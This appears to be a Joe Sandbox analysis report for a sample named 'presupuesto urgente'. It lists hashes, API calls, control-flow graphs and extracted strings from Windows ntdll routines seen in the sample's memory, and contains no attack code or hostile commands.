                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                      • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                      • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:100%
                                                                                                                                                      Total number of Nodes:1
                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                      execution_graph 48837 33572b90 LdrInitializeThunk

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2 335734e0-335734ec LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 6bed7f82d961147cf2b7a3b57266751369deac43301b9811b2bfc56592187ed4
                                                                                                                                                      • Instruction ID: dee707304b1de71686abcd7552c50c805d06519e0b1b17d39dadd377ae2c997e
                                                                                                                                                      • Opcode Fuzzy Hash: 6bed7f82d961147cf2b7a3b57266751369deac43301b9811b2bfc56592187ed4
                                                                                                                                                      • Instruction Fuzzy Hash: BE90023170510842D50062585624706104587D0202F61CC16A0414928DC7A5895979A2

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 33572b90-33572b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 56cccc9ddbd96a2d058a3a26ad6d245d7fc35a42edbbbee690bad40f34ce3510
                                                                                                                                                      • Instruction ID: 17b984622b95800ebd4e8ff09f2b7c55c3b4fb921388ef4753e0e050e7a1bbba
                                                                                                                                                      • Opcode Fuzzy Hash: 56cccc9ddbd96a2d058a3a26ad6d245d7fc35a42edbbbee690bad40f34ce3510
                                                                                                                                                      • Instruction Fuzzy Hash: 9790023130108C42D5106258951474A004587D0302F55CC16A4414A18DC6A588997521

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1 33572d10-33572d1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 59244f8a921e553bb4ad055e7a28d5676c213ed5916e919ce64d69f9ffe0a803
                                                                                                                                                      • Instruction ID: 55e9e9e8f54705f627f29d7fa82256df6fd74898c329cb1ab2cc93687f4b1df2
                                                                                                                                                      • Opcode Fuzzy Hash: 59244f8a921e553bb4ad055e7a28d5676c213ed5916e919ce64d69f9ffe0a803
                                                                                                                                                      • Instruction Fuzzy Hash: 8C90023130100853D51162585614707004987D0242F91CC17A0414918DD666895AB521

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 554 335d9060-335d90a9 555 335d90f8-335d9107 554->555 556 335d90ab-335d90b0 554->556 557 335d90b4-335d90ba 555->557 558 335d9109-335d910e 555->558 556->557 559 335d9215-335d923d call 33578f40 557->559 560 335d90c0-335d90e4 call 33578f40 557->560 561 335d9893-335d98a7 call 33574b50 558->561 570 335d925c-335d9292 559->570 571 335d923f-335d925a call 335d98aa 559->571 568 335d90e6-335d90f3 call 335f92ab 560->568 569 335d9113-335d91b4 GetPEB call 335dd7e5 560->569 580 335d91fd-335d9210 RtlDebugPrintTimes 568->580 581 335d91b6-335d91c4 569->581 582 335d91d2-335d91e7 569->582 575 335d9294-335d9296 570->575 571->575 575->561 579 335d929c-335d92b1 RtlDebugPrintTimes 575->579 579->561 588 335d92b7-335d92be 579->588 580->561 581->582 585 335d91c6-335d91cb 581->585 582->580 583 335d91e9-335d91ee 582->583 586 335d91f0 583->586 587 335d91f3-335d91f6 583->587 585->582 586->587 587->580 588->561 590 335d92c4-335d92df 588->590 591 335d92e3-335d92f4 call 335da388 590->591 594 335d92fa-335d92fc 591->594 595 335d9891 591->595 594->561 596 335d9302-335d9309 594->596 595->561 597 335d947c-335d9482 596->597 598 335d930f-335d9314 596->598 599 335d961c-335d9622 597->599 600 335d9488-335d94b7 call 33578f40 597->600 601 335d933c 598->601 602 335d9316-335d931c 598->602 604 335d9674-335d9679 599->604 605 335d9624-335d962d 599->605 616 335d94b9-335d94c4 600->616 617 335d94f0-335d9505 600->617 607 335d9340-335d9391 call 33578f40 RtlDebugPrintTimes 601->607 602->601 606 335d931e-335d9332 602->606 610 335d967f-335d9687 604->610 611 335d9728-335d9731 604->611 605->591 609 335d9633-335d966f call 33578f40 605->609 612 335d9338-335d933a 606->612 613 335d9334-335d9336 606->613 607->561 640 335d9397-335d939b 607->640 634 335d9869 609->634 620 335d9689-335d968d 610->620 621 335d9693-335d96bd call 335d8093 610->621 611->591 618 335d9737-335d973a 611->618 612->607 613->607 622 335d94cf-335d94ee 616->622 623 335d94c6-335d94cd 616->623 627 335d9507-335d9509 617->627 628 335d9511-335d9518 617->628 624 335d97fd-335d9834 call 33578f40 618->624 625 335d9740-335d978a 618->625 620->611 620->621 646 335d9888-335d988c 621->646 647 335d96c3-335d971e call 33578f40 RtlDebugPrintTimes 621->647 633 335d9559-335d9576 RtlDebugPrintTimes 622->633 623->622 649 335d983b-335d9842 624->649 650 335d9836 624->650 631 335d978c 625->631 632 335d9791-335d979e 625->632 635 335d950f 627->635 636 335d950b-335d950d 627->636 637 335d953d-335d953f 628->637 631->632 643 335d97aa-335d97ad 632->643 644 335d97a0-335d97a3 632->644 633->561 667 335d957c-335d959f call 33578f40 633->667 645 335d986d 634->645 635->628 636->628 641 335d951a-335d9524 637->641 642 335d9541-335d9557 637->642 651 335d939d-335d93a5 640->651 652 335d93eb-335d9400 640->652 657 335d952d 641->657 658 335d9526 641->658 642->633 655 335d97af-335d97b2 643->655 656 335d97b9-335d97fb 643->656 644->643 654 335d9871-335d9886 RtlDebugPrintTimes 645->654 646->591 647->561 683 335d9724 647->683 662 335d984d 649->662 663 335d9844-335d984b 649->663 650->649 664 335d93a7-335d93d0 call 335d8093 651->664 665 335d93d2-335d93e9 651->665 666 335d9406-335d9414 652->666 654->561 654->646 655->656 656->654 661 335d952f-335d9531 657->661 658->642 668 335d9528-335d952b 658->668 669 335d953b 661->669 670 335d9533-335d9535 661->670 671 335d9851-335d9857 662->671 663->671 673 335d9418-335d946f call 33578f40 RtlDebugPrintTimes 664->673 665->666 666->673 686 335d95bd-335d95d8 667->686 687 335d95a1-335d95bb 667->687 668->661 669->637 670->669 677 335d9537-335d9539 670->677 678 335d985e-335d9864 671->678 679 335d9859-335d985c 671->679 673->561 690 335d9475-335d9477 673->690 677->637 678->645 684 335d9866 678->684 679->634 683->611 684->634 688 335d95dd-335d960b RtlDebugPrintTimes 686->688 687->688 688->561 692 335d9611-335d9617 688->692 690->646 692->618
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $ $0
                                                                                                                                                      • API String ID: 3446177414-3352262554
                                                                                                                                                      • Opcode ID: 0f2fa418dca22cb7c3d532d1f706dbaf00047d039d5b202b3bf6d19b79dadead
                                                                                                                                                      • Instruction ID: c89b5c370bc83f300346bf489177525c870b65e4e09f2602a5f102367f61c07f
                                                                                                                                                      • Opcode Fuzzy Hash: 0f2fa418dca22cb7c3d532d1f706dbaf00047d039d5b202b3bf6d19b79dadead
                                                                                                                                                      • Instruction Fuzzy Hash: 123221B1A083819FE350CF68E884B5BBBE5BFC8744F44492EF59987250D774E909CB52

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 763 33568540-335685a1 764 335685a7-335685b8 763->764 765 335a50a2-335a50a8 763->765 765->764 766 335a50ae-335a50bb GetPEB 765->766 766->764 767 335a50c1-335a50c4 766->767 768 335a50e1-335a5107 call 33572c00 767->768 769 335a50c6-335a50d0 767->769 768->764 774 335a510d-335a5111 768->774 769->764 771 335a50d6-335a50df 769->771 773 335a5138-335a514c call 335353c0 771->773 779 335a5152-335a515e 773->779 774->764 776 335a5117-335a512c call 33572c00 774->776 776->764 783 335a5132 776->783 781 335a5367-335a5373 call 335a5378 779->781 782 335a5164-335a5178 779->782 781->764 785 335a517a 782->785 786 335a5196-335a520c 782->786 783->773 789 335a517c-335a5183 785->789 790 335a520e-335a5240 call 3352fcf0 786->790 791 335a5245-335a5248 786->791 789->786 792 335a5185-335a5187 789->792 803 335a5358-335a535d call 335ba130 790->803 794 335a524e-335a529f 791->794 795 335a531f-335a5322 791->795 796 335a5189-335a518c 792->796 797 335a518e-335a5190 792->797 804 335a52d9-335a531d call 3352fcf0 * 2 794->804 805 335a52a1-335a52d7 call 3352fcf0 794->805 798 335a5360-335a5362 795->798 799 335a5324-335a5353 call 3352fcf0 795->799 796->789 797->786 797->798 798->779 799->803 803->798 804->803 805->803
                                                                                                                                                      Strings
                                                                                                                                                      • Critical section address, xrefs: 335A5230, 335A52C7, 335A533F
                                                                                                                                                      • Thread identifier, xrefs: 335A5345
                                                                                                                                                      • Critical section address., xrefs: 335A530D
                                                                                                                                                      • corrupted critical section, xrefs: 335A52CD
                                                                                                                                                      • undeleted critical section in freed memory, xrefs: 335A5236
                                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 335A52ED
                                                                                                                                                      • double initialized or corrupted critical section, xrefs: 335A5313
                                                                                                                                                      • 8, xrefs: 335A50EE
                                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 335A52D9
                                                                                                                                                      • Address of the debug info found in the active list., xrefs: 335A52B9, 335A5305
                                                                                                                                                      • Critical section debug info address, xrefs: 335A522A, 335A5339
                                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 335A534E
                                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 335A52C1
                                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 335A5215, 335A52A1, 335A5324
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                                      • Opcode ID: a0680a40d6412d5f563bbd3086d1175c064d7738fee434cfde0722705a433ab9
                                                                                                                                                      • Instruction ID: 97288a6bc6af5ff17e016718eb33db29d7179a49e341804e8e978f6d3546f711
                                                                                                                                                      • Opcode Fuzzy Hash: a0680a40d6412d5f563bbd3086d1175c064d7738fee434cfde0722705a433ab9
                                                                                                                                                      • Instruction Fuzzy Hash: FD81ACB0D01348BFEB20CF98E880F9EBBB9FB48715F24455AE494B7241C7B4A944CB50

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1146 3352d2ec-3352d32d 1147 3352d333-3352d335 1146->1147 1148 3358a69c 1146->1148 1147->1148 1149 3352d33b-3352d33e 1147->1149 1151 3358a6a6-3358a6bf call 335ebd08 1148->1151 1149->1148 1150 3352d344-3352d34c 1149->1150 1152 3352d356-3352d3a1 call 33575050 call 33572ab0 1150->1152 1153 3352d34e-3352d350 1150->1153 1158 3352d56a-3352d56d 1151->1158 1159 3358a6c5-3358a6c8 1151->1159 1170 3352d3a7-3352d3b0 1152->1170 1171 3358a600-3358a61a call 33527220 1152->1171 1153->1152 1155 3358a5f6-3358a5fb 1153->1155 1161 3352d5c0-3352d5c8 1155->1161 1162 3352d56f-3352d575 1158->1162 1163 3352d54d-3352d54f 1159->1163 1165 3352d63b-3352d63d 1162->1165 1166 3352d57b-3352d588 GetPEB call 33543bc0 1162->1166 1163->1158 1168 3352d551-3352d564 call 33553262 1163->1168 1172 3352d58d-3352d592 1165->1172 1166->1172 1168->1158 1180 3358a6cd-3358a6d2 1168->1180 1177 3352d3b2-3352d3b4 1170->1177 1178 3352d3ba-3352d3cd call 3352d736 1170->1178 1191 3358a61c-3358a61e 1171->1191 1192 3358a624-3358a628 1171->1192 1175 3352d5a1-3352d5a6 1172->1175 1176 3352d594-3352d59d call 33572a80 1172->1176 1183 3352d5b5-3352d5ba 1175->1183 1184 3352d5a8-3352d5b1 call 33572a80 1175->1184 1176->1175 1177->1178 1182 3358a630-3358a63b call 335ead61 1177->1182 1197 3358a658 1178->1197 1198 3352d3d3-3352d3d7 1178->1198 1180->1158 1182->1178 1200 3358a641-3358a653 1182->1200 1183->1161 1193 3358a6d7-3358a6db call 33572a80 1183->1193 1184->1183 1191->1192 1199 3352d52e 1191->1199 1192->1182 1201 3358a6e0 1193->1201 1206 3358a660-3358a662 1197->1206 1203 3352d5cb-3352d623 call 33575050 call 33572ab0 1198->1203 1204 3352d3dd-3352d3f7 call 3352d8d0 1198->1204 1202 3352d530-3352d535 1199->1202 1200->1178 1201->1201 1207 3352d537-3352d539 1202->1207 1208 3352d549 1202->1208 1220 3352d642-3352d645 1203->1220 1221 3352d625 1203->1221 1204->1206 1214 3352d3fd-3352d44e call 33575050 call 33572ab0 1204->1214 1206->1158 1211 3358a668 1206->1211 1207->1151 1212 3352d53f-3352d543 1207->1212 1208->1163 1218 3358a66d 1211->1218 1212->1151 1212->1208 1214->1197 1226 3352d454-3352d45d 1214->1226 1223 3358a677-3358a67c 1218->1223 1220->1199 1225 3352d62f-3352d636 1221->1225 1223->1165 1225->1202 1226->1218 1227 3352d463-3352d492 call 33575050 call 3352d64a 1226->1227 1227->1225 1232 3352d498-3352d49e 1227->1232 1232->1225 1233 3352d4a4-3352d4aa 1232->1233 1233->1165 1234 3352d4b0-3352d4cc GetPEB call 33545d90 1233->1234 1234->1223 1237 3352d4d2-3352d4ef call 3352d64a 1234->1237 1240 3352d4f1-3352d4f6 1237->1240 1241 3352d526-3352d52c 1237->1241 1242 3358a681-3358a686 1240->1242 1243 3352d4fc-3352d524 call 33554ca6 1240->1243 1241->1162 1241->1199 1242->1243 1245 3358a68c-3358a697 1242->1245 1243->1241 1245->1202
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.U3
                                                                                                                                                      • API String ID: 0-648157591
                                                                                                                                                      • Opcode ID: 879813d37923430b37459eac68ad970ed407e964a1584134025e401acd35382d
                                                                                                                                                      • Instruction ID: 405243037b55b2bfd9b44936419b6ad2caca76894d85e13d7a3beee2a2706551
                                                                                                                                                      • Opcode Fuzzy Hash: 879813d37923430b37459eac68ad970ed407e964a1584134025e401acd35382d
                                                                                                                                                      • Instruction Fuzzy Hash: 08B17CB6A083419FD711CF24E440B5FBBE8AF84754F45492EF8A4D7280DB70D9488B92

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1371 335d86c2-335d873a GetPEB call 33530670 1374 335d8740-335d875e call 335342b0 1371->1374 1375 335d8892-335d889a 1371->1375 1381 335d877f-335d8787 1374->1381 1382 335d8760-335d8779 call 33577ad0 1374->1382 1376 335d889b-335d88b0 call 33574b50 1375->1376 1383 335d8789-335d879e call 33564f11 1381->1383 1384 335d87b7-335d87c0 1381->1384 1382->1375 1382->1381 1383->1375 1391 335d87a4-335d87ac 1383->1391 1384->1375 1388 335d87c6-335d87c8 1384->1388 1388->1376 1390 335d87ce-335d87dc 1388->1390 1392 335d87e8-335d87ee 1390->1392 1391->1375 1393 335d87b2 1391->1393 1394 335d87de-335d87e2 1392->1394 1395 335d87f0 1392->1395 1393->1376 1396 335d87e4-335d87e5 1394->1396 1397 335d87f2-335d87f4 1394->1397 1398 335d884f-335d8875 call 33564e50 1395->1398 1396->1392 1397->1398 1400 335d87f6-335d87ff 1397->1400 1398->1376 1404 335d8877-335d8890 call 33577ad0 1398->1404 1400->1398 1401 335d8801-335d8803 1400->1401 1403 335d8807-335d881b call 33577ad0 1401->1403 1409 335d881d 1403->1409 1410 335d8839 1403->1410 1404->1375 1404->1376 1411 335d8820-335d8829 1409->1411 1412 335d883d-335d884d 1410->1412 1411->1411 1413 335d882b-335d8835 1411->1413 1412->1398 1412->1403 1413->1375 1414 335d8837 1413->1414 1414->1412
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                                      • Opcode ID: a4a6375b0d8cdb1f65704d4f8c7156424100988c1417a890bc7acb1b17d635e1
                                                                                                                                                      • Instruction ID: b349d124decd8d9c97bff2b05b62274fb026d502b221d9fe9cbe90e32fda0470
                                                                                                                                                      • Opcode Fuzzy Hash: a4a6375b0d8cdb1f65704d4f8c7156424100988c1417a890bc7acb1b17d635e1
                                                                                                                                                      • Instruction Fuzzy Hash: AD51BCB59043519BD325DF18E840BABB7ECEFC4391F444A2DB9A8C3290E771D644CB92
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      • Opcode ID: 610d13afcc36e18149e9eac3e7fc270ba4e7d8625b7a4bfd487e54289250b686
                                                                                                                                                      • Instruction ID: 7573441ae33c7f4b74070b2ff19150db9b2083c54bdbe1bc200ae3d98204bb65
                                                                                                                                                      • Opcode Fuzzy Hash: 610d13afcc36e18149e9eac3e7fc270ba4e7d8625b7a4bfd487e54289250b686
                                                                                                                                                      • Instruction Fuzzy Hash: 5A910275900785EFDB02CFA8E850A9DBBF1FF89310F498659E441EBB91CB759941CB10
                                                                                                                                                      Strings
                                                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3352D06F
                                                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3352D0E6
                                                                                                                                                      • @, xrefs: 3352D24F
                                                                                                                                                      • h.U3, xrefs: 3358A5D2
                                                                                                                                                      • @, xrefs: 3352D2B3
                                                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3352D202
                                                                                                                                                      • @, xrefs: 3352D09D
                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3352D263
                                                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 3352D136
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.U3
                                                                                                                                                      • API String ID: 0-4009894377
                                                                                                                                                      • Opcode ID: 2ce607f99ee1ace9a1826a91fbbab2f8a7d8ee713dc0886cc7653d61f4f146ae
                                                                                                                                                      • Instruction ID: 1786683114e8bf5ae9c332ea478be883d6aa09f045f0ff090031433b569b77cd
                                                                                                                                                      • Opcode Fuzzy Hash: 2ce607f99ee1ace9a1826a91fbbab2f8a7d8ee713dc0886cc7653d61f4f146ae
                                                                                                                                                      • Instruction Fuzzy Hash: E4A137B19083459FE721CF20E480B9BBBE8AF84755F41492EE998D6680E774D948CF92
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3355D879
                                                                                                                                                        • Part of subcall function 33534779: RtlDebugPrintTimes.NTDLL ref: 33534817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
